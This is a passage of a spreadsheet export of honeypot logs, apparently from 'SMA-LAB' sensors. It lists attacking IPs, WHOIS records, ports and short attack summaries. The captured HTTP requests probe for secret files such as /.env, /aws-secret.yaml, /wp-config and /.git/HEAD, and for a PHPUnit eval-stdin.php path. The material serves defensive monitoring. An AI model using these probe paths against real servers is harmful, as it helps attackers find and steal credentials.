'HOST:', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': '209.145.61.177', 'command': 'HOST:', 'data': 'None'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SMTP:{'arg': '122.170.7.108', 'command': 'HOST:', 'data': 'None'}}&amp;&amp;{Data_SMB:Incoming connection (170.39.218.202,58560)}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/phpinfo'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/phpinfo.php'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/portal/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/env/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/api/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/app/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/dev/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/new/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '154.93.37.45', 'method': 'GET', 'uri': '/.git/HEAD'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/phpinfo'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/phpinfo.php'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/portal/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/env/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'method': 'GET', 'uri': '/.git/HEAD'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/phpinfo'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/portal/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/env/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/portal/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/app/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/app/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/new/.env.local'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/new/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/new/.env.staging'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/new/.env.local'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/_profiler/phpinfo'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/new/.env.staging'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/_profiler/phpinfo/phpinfo.php'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/wp-config'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/aws-secret.yaml'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/conf/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/docker/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/docker/app/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/docker/app/.env'}}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:aa27:daca</t>
  </si>
  <si>
    <t>a4cada4cd52b456c641217155df4a4ba</t>
  </si>
  <si>
    <t>37.19.210.8</t>
  </si>
  <si>
    <t>Cdnext DEN</t>
  </si>
  <si>
    <t>2011-12-21</t>
  </si>
  <si>
    <t>::ffff:2513:d208</t>
  </si>
  <si>
    <t>The attacker is probing various services and protocols to identify potential vulnerabilities, likely as part of a reconnaissance phase before launching a more targeted attack.</t>
  </si>
  <si>
    <t>868ad54ea837617d937e1919af43442d</t>
  </si>
  <si>
    <t>1.64.186.197</t>
  </si>
  <si>
    <t>NA&amp;&amp;1-64-186-197.static.netvigator.com</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>2010-06-29</t>
  </si>
  <si>
    <t>1996-02-09 05:00:00</t>
  </si>
  <si>
    <t>2026-02-10 05:00:00</t>
  </si>
  <si>
    <t>2025-02-06 06:38:39</t>
  </si>
  <si>
    <t>['NS4.NETVIGATOR.COM', 'NS5.NETVIGATOR.COM']</t>
  </si>
  <si>
    <t>['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited']</t>
  </si>
  <si>
    <t>Domain Administrator</t>
  </si>
  <si>
    <t>['domainabuse@cscglobal.com', 'domain.admin@pccw.com']</t>
  </si>
  <si>
    <t>RM902, 9F East Exchange Tower 38-40 Leighton Road</t>
  </si>
  <si>
    <t>::ffff:140:bac5</t>
  </si>
  <si>
    <t>9a58a61a715d2e327b100e066fbe0aa1</t>
  </si>
  <si>
    <t>84.51.53.251</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_SSH_H38&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H5</t>
  </si>
  <si>
    <t>39.9334</t>
  </si>
  <si>
    <t>32.8597</t>
  </si>
  <si>
    <t>Global Iletisim Hizmetleri</t>
  </si>
  <si>
    <t>::ffff:5433:35fb</t>
  </si>
  <si>
    <t>4cde9e7b7e1420cbb1ed23ca8bc6aeb1</t>
  </si>
  <si>
    <t>148.113.191.228</t>
  </si>
  <si>
    <t>wincloud228667.mywhc.ca&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_MSSQL_H8</t>
  </si>
  <si>
    <t>1433&amp;&amp;16808&amp;&amp;16012&amp;&amp;18118&amp;&amp;17913&amp;&amp;17001&amp;&amp;18389&amp;&amp;49184&amp;&amp;6370&amp;&amp;5592&amp;&amp;7494&amp;&amp;18321&amp;&amp;19078&amp;&amp;17301&amp;&amp;19375&amp;&amp;35029&amp;&amp;37366&amp;&amp;37005&amp;&amp;36121&amp;&amp;17630&amp;&amp;21399&amp;&amp;28934&amp;&amp;34821&amp;&amp;36164&amp;&amp;39320&amp;&amp;36144&amp;&amp;37953&amp;&amp;41158&amp;&amp;45593&amp;&amp;48410&amp;&amp;7181&amp;&amp;9001&amp;&amp;25016&amp;&amp;10576&amp;&amp;7983&amp;&amp;49054&amp;&amp;9897&amp;&amp;7669&amp;&amp;17478&amp;&amp;34416&amp;&amp;42624&amp;&amp;6691&amp;&amp;8626&amp;&amp;10734&amp;&amp;11823&amp;&amp;15827&amp;&amp;24561&amp;&amp;29571&amp;&amp;28614&amp;&amp;26794&amp;&amp;33012&amp;&amp;17327&amp;&amp;11194&amp;&amp;13033&amp;&amp;14614&amp;&amp;13998&amp;&amp;17929&amp;&amp;15918&amp;&amp;24849&amp;&amp;25783&amp;&amp;21300&amp;&amp;26418&amp;&amp;9362&amp;&amp;16069&amp;&amp;28108&amp;&amp;30660&amp;&amp;28555&amp;&amp;31774&amp;&amp;32430&amp;&amp;31444&amp;&amp;36299&amp;&amp;31195&amp;&amp;5594&amp;&amp;12240&amp;&amp;21759&amp;&amp;23192&amp;&amp;25388&amp;&amp;5816&amp;&amp;7257&amp;&amp;10707&amp;&amp;10146&amp;&amp;9070&amp;&amp;12202&amp;&amp;10751&amp;&amp;14944&amp;&amp;21443&amp;&amp;22893&amp;&amp;26362&amp;&amp;44871&amp;&amp;28529&amp;&amp;28991&amp;&amp;33642&amp;&amp;31664&amp;&amp;34599&amp;&amp;14184&amp;&amp;43610&amp;&amp;45270&amp;&amp;35812&amp;&amp;46373&amp;&amp;39169&amp;&amp;41945&amp;&amp;41045&amp;&amp;44904&amp;&amp;43976&amp;&amp;48134&amp;&amp;44675&amp;&amp;48754&amp;&amp;49471&amp;&amp;17434&amp;&amp;5650&amp;&amp;8541&amp;&amp;7677&amp;&amp;10489&amp;&amp;11689&amp;&amp;6554&amp;&amp;14196&amp;&amp;16590&amp;&amp;18290&amp;&amp;26821&amp;&amp;27340&amp;&amp;31066&amp;&amp;34332&amp;&amp;35140&amp;&amp;37772&amp;&amp;39223&amp;&amp;42389&amp;&amp;44234&amp;&amp;43601&amp;&amp;46152&amp;&amp;44536&amp;&amp;44713&amp;&amp;48572&amp;&amp;5555&amp;&amp;44181&amp;&amp;19755&amp;&amp;13021&amp;&amp;12484&amp;&amp;14540&amp;&amp;13495&amp;&amp;14662&amp;&amp;18005&amp;&amp;18471&amp;&amp;49591&amp;&amp;34349&amp;&amp;33237&amp;&amp;35900&amp;&amp;38773&amp;&amp;36916&amp;&amp;41105&amp;&amp;39772&amp;&amp;42138&amp;&amp;42693&amp;&amp;46346&amp;&amp;45662&amp;&amp;31059&amp;&amp;43449&amp;&amp;23398&amp;&amp;25562&amp;&amp;26278&amp;&amp;27355&amp;&amp;28286&amp;&amp;29272&amp;&amp;37891&amp;&amp;30069&amp;&amp;31909&amp;&amp;42745&amp;&amp;33812&amp;&amp;24301&amp;&amp;15821&amp;&amp;17841&amp;&amp;18359&amp;&amp;19052&amp;&amp;23930&amp;&amp;22221&amp;&amp;26623&amp;&amp;25540&amp;&amp;30554&amp;&amp;34846&amp;&amp;25084&amp;&amp;32058&amp;&amp;16699&amp;&amp;26066&amp;&amp;25222&amp;&amp;30745&amp;&amp;23982&amp;&amp;29528&amp;&amp;30159&amp;&amp;29782&amp;&amp;30595&amp;&amp;30027&amp;&amp;16123&amp;&amp;21465&amp;&amp;13393&amp;&amp;32734&amp;&amp;37690&amp;&amp;17230&amp;&amp;31095&amp;&amp;19195&amp;&amp;20748&amp;&amp;47024&amp;&amp;49741&amp;&amp;48073&amp;&amp;48907&amp;&amp;21240&amp;&amp;9327&amp;&amp;7365&amp;&amp;7962&amp;&amp;10284&amp;&amp;12825&amp;&amp;13245&amp;&amp;25513&amp;&amp;36946&amp;&amp;34861&amp;&amp;37752&amp;&amp;40664&amp;&amp;39123&amp;&amp;43603&amp;&amp;42835&amp;&amp;45747&amp;&amp;44038&amp;&amp;46525&amp;&amp;48360&amp;&amp;49334&amp;&amp;49892&amp;&amp;6200&amp;&amp;28011&amp;&amp;23976&amp;&amp;21614&amp;&amp;21572&amp;&amp;28382&amp;&amp;40603&amp;&amp;37522&amp;&amp;48047&amp;&amp;47306&amp;&amp;47916&amp;&amp;47868&amp;&amp;29226&amp;&amp;36796&amp;&amp;37120&amp;&amp;24600&amp;&amp;25922&amp;&amp;29502&amp;&amp;26646&amp;&amp;31634&amp;&amp;32241&amp;&amp;27752&amp;&amp;7493&amp;&amp;28696&amp;&amp;31881&amp;&amp;29642&amp;&amp;32394&amp;&amp;33880&amp;&amp;35366&amp;&amp;35846&amp;&amp;38879&amp;&amp;34577&amp;&amp;39785&amp;&amp;7639&amp;&amp;7239&amp;&amp;7961&amp;&amp;28480&amp;&amp;9820&amp;&amp;9116&amp;&amp;12644&amp;&amp;10905&amp;&amp;14784&amp;&amp;9919&amp;&amp;11127&amp;&amp;11368&amp;&amp;11663&amp;&amp;14071&amp;&amp;13429&amp;&amp;13844&amp;&amp;29630&amp;&amp;17557&amp;&amp;14085&amp;&amp;15939&amp;&amp;20823&amp;&amp;19172&amp;&amp;23214&amp;&amp;26260&amp;&amp;49205&amp;&amp;7396&amp;&amp;6972&amp;&amp;8184&amp;&amp;7772&amp;&amp;34429&amp;&amp;47682&amp;&amp;15733&amp;&amp;14518&amp;&amp;20424&amp;&amp;17787&amp;&amp;21169&amp;&amp;25157&amp;&amp;18409&amp;&amp;24795&amp;&amp;18512&amp;&amp;18430&amp;&amp;22474&amp;&amp;26442&amp;&amp;23737&amp;&amp;39255&amp;&amp;43144&amp;&amp;17348&amp;&amp;23226&amp;&amp;26250&amp;&amp;36806&amp;&amp;40695&amp;&amp;41453&amp;&amp;40125&amp;&amp;8345&amp;&amp;25998&amp;&amp;25056&amp;&amp;30781&amp;&amp;27463&amp;&amp;26489&amp;&amp;26839&amp;&amp;35484&amp;&amp;42882&amp;&amp;19454&amp;&amp;16800&amp;&amp;18099&amp;&amp;20161&amp;&amp;19806&amp;&amp;45763&amp;&amp;10756&amp;&amp;27038&amp;&amp;35487&amp;&amp;28379&amp;&amp;32088&amp;&amp;11564&amp;&amp;44765&amp;&amp;45604&amp;&amp;18451&amp;&amp;6410&amp;&amp;30973&amp;&amp;43140&amp;&amp;34643&amp;&amp;34675&amp;&amp;37858&amp;&amp;35479&amp;&amp;10650&amp;&amp;11052&amp;&amp;12388&amp;&amp;30878&amp;&amp;6694&amp;&amp;33386&amp;&amp;33414&amp;&amp;40629&amp;&amp;44671&amp;&amp;45435&amp;&amp;10976</t>
  </si>
  <si>
    <t>Montérégie</t>
  </si>
  <si>
    <t>Beauharnois</t>
  </si>
  <si>
    <t>5896495</t>
  </si>
  <si>
    <t>J6N</t>
  </si>
  <si>
    <t>45.3147</t>
  </si>
  <si>
    <t>-73.8785</t>
  </si>
  <si>
    <t>OVH Hosting, Inc</t>
  </si>
  <si>
    <t>2021-09-14</t>
  </si>
  <si>
    <t>HO-2</t>
  </si>
  <si>
    <t>2015-09-17 14:59:58</t>
  </si>
  <si>
    <t>2030-09-17 14:59:58</t>
  </si>
  <si>
    <t>2024-11-05 21:39:29</t>
  </si>
  <si>
    <t>['ns1.whc.ca', 'ns2.whc.ca', 'ns3.whc.ca']</t>
  </si>
  <si>
    <t>WHC Online Solutions Inc.</t>
  </si>
  <si>
    <t>['abuse@whc.ca', 'emil@whc.ca', 'corp@whc.ca']</t>
  </si>
  <si>
    <t>+1.5145042113</t>
  </si>
  <si>
    <t>::ffff:9471:bfe4</t>
  </si>
  <si>
    <t>The attacker is attempting to scan and probe various network services, likely in an attempt to identify potential entry points for exploitation. They are sending test requests to different ports and services, such as DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, RDP, REDIS, SIP, SMB, SMTP, SNMP, and PostgreSQL, to see which ones are active or vulnerable.</t>
  </si>
  <si>
    <t>**Port Scan Attack**</t>
  </si>
  <si>
    <t>d22653c624980208fa2a6f28a8f8c3da</t>
  </si>
  <si>
    <t>109.201.191.224</t>
  </si>
  <si>
    <t>SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H23</t>
  </si>
  <si>
    <t>41750</t>
  </si>
  <si>
    <t>Mega-Line Ltd.</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (109.201.191.224,64265)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (109.201.191.224,51099)}&amp;&amp;{Data_SMB:Incoming connection (109.201.191.224,51506)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (109.201.191.224,63746)}&amp;&amp;{Data_SMB:Incoming connection (109.201.191.224,64241)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (109.201.191.224,53083)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (109.201.191.224,56389)}&amp;&amp;{Data_SMB:Incoming connection (109.201.191.224,56700)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (109.201.191.224,61957)}&amp;&amp;{Data_SMB:Incoming connection (109.201.191.224,62430)}</t>
  </si>
  <si>
    <t>::ffff:6dc9:bfe0</t>
  </si>
  <si>
    <t>817c9cd62c8a2406efcf2fe7793a147e</t>
  </si>
  <si>
    <t>117.211.78.243</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H30</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;51753&amp;&amp;NA</t>
  </si>
  <si>
    <t>NME Project</t>
  </si>
  <si>
    <t>::ffff:75d3:4ef3</t>
  </si>
  <si>
    <t>65e2b395f712cb3059db4236be5fae57</t>
  </si>
  <si>
    <t>185.60.136.37</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>37688&amp;&amp;23&amp;&amp;80&amp;&amp;443&amp;&amp;NA</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']</t>
  </si>
  <si>
    <t>35.7779</t>
  </si>
  <si>
    <t>51.3946</t>
  </si>
  <si>
    <t>21341</t>
  </si>
  <si>
    <t>Soroush Rasanheh Company Ltd</t>
  </si>
  <si>
    <t>NA&amp;&amp;connection&amp;&amp;login&amp;&amp;GET&amp;&amp;POST</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/vendor/phpunit/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/vendor/phpunit/phpunit/LICENSE/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 